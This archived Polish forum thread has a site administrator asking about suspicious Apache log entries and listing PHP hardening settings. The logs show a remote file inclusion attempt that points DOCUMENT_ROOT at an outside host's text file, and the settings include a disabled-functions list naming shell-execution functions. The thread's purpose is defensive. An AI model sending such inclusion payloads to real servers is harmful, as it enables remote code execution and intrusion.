Skocz do zawartości

[apache] Dziwne logi serwera

eneduerabe

Przez eneduerabe
w PHP i MySQL i inne

Rekomendowane odpowiedzi

eneduerabe Newbie

eneduerabe

Opublikowano
Opublikowano

witam,

wiem, że to nie do końca ten dział, ale chyba nie ma bardziej odpowiedniego.

przeglądając logi natrafiłem na coś takiego:

61.108.83.106 - - [26/Nov/2009:11:06:44 +0100] "GET /strona.html%20%20///?_SERVER[DOCUMENT_ROOT]=https://n34.biz/id1.txt? HTTP/1.1" 404 75

61.108.83.106 - - [26/Nov/2009:11:06:44 +0100] "GET ///?_SERVER[DOCUMENT_ROOT]=https://n34.biz/id1.txt? HTTP/1.1" 200 31801

trochę mnie to zaniepokoiło (próba zmiany DOCUMENT_ROOT ??). wszystko działa i zdaje się, że jest ok. czy mógłbym jednak prosić o interpretację i jeśli to próba włamu, to jak się przed tym uchronić?

pozdrawiam serdecznie

Odnośnik do komentarza
Udostępnij na innych stronach
zgred Mentor

zgred

Opublikowano
Opublikowano

zobacz co to za plik https://n34.biz/id1.txt - pewnie jakis kawałek shellowego skryptu. proba jego odpalenia zapewne.

Agencja marketingowa Semgence istnieje na rynku od 2018 i odpowiada za prowadzenie działań SEO dla wielu firm małych i dużych. Prowadzimy też kampanie Google Ads - niedawno zostaliśmy sie Partnerem Google spełniając odpowiednie kryteria. Betapoint

 

 

Odnośnik do komentarza
Udostępnij na innych stronach
Mion Veteran

Mion

Opublikowano
Opublikowano

Zablokuj IP 61.108.83.106 z którego było te żądanie GET

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel
Komory normobaryczne - normobaria.tech Wykonawca montażu i instalacji komory normobarii

Odnośnik do komentarza
Udostępnij na innych stronach
eneduerabe Newbie

eneduerabe

Opublikowano
  • Autor
Opublikowano
Zablokuj IP 61.108.83.106 z którego było te żądanie GET

ok, od tego zacząłem :) ale mi chodzi bardziej globalnie, na co zwrócić uwagę w konfiguracji serwera i/lub aplikacji?

dodam jeszcze co mam:

- safe_mode = On

- disable_functions = phpinfo, exec, passthru, system , fopen, fsockopen

- register_globals = Off

- expose_php = Off

- allow_url_fopen = Off

- ServerSignature Off

- ServerToken Prod

może byście coś dorzucili do tego zestawu?

pozdrawiam serdecznie

Odnośnik do komentarza
Udostępnij na innych stronach
zgred Mentor

zgred

Opublikowano
Opublikowano

w sumei wywal plik GET albo daj mu inna nazwe - jak go bedzies zpotrzebować to sobie zmienisz na powrót :)

Agencja marketingowa Semgence istnieje na rynku od 2018 i odpowiada za prowadzenie działań SEO dla wielu firm małych i dużych. Prowadzimy też kampanie Google Ads - niedawno zostaliśmy sie Partnerem Google spełniając odpowiednie kryteria. Betapoint

 

 

Odnośnik do komentarza
Udostępnij na innych stronach
Mion Veteran

Mion

Opublikowano
Opublikowano

GET to jest typ żądania HTTP, a nie plik..

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel
Komory normobaryczne - normobaria.tech Wykonawca montażu i instalacji komory normobarii

Odnośnik do komentarza
Udostępnij na innych stronach
sniver Newbie

sniver

Opublikowano
Opublikowano

1. zrób stronę 404 i dodaj ją do konfiguracji apache

2. zrób "przeciążeniówkę" i dodaj ją do konfiguracji apache

3. oprogramowanie jeśli nie może czegoś wyświetlić bo takiej treści nie ma to 404...

4. dodaj obsługę błędów w kodzie - nie uchronisz się przed takimi "smakołykami", ale możesz uszczelnić wiele bugów

Ataki które wykorzystują mozliwie każdy dostępny slot w serwerach WWW są bardzo popularne, a zapełnienie całej puli (np. możliwe jest tylko 50 połączeń) uniemożliwi uruchomienie strony osobie która chce się na nią dostać...

..:: Strony WWW ::....:: Nowe technologie ::....:: Hurtownie ::....:: Reszte znajdziesz w google.pl ::..

Odnośnik do komentarza
Udostępnij na innych stronach

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

Tematy

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności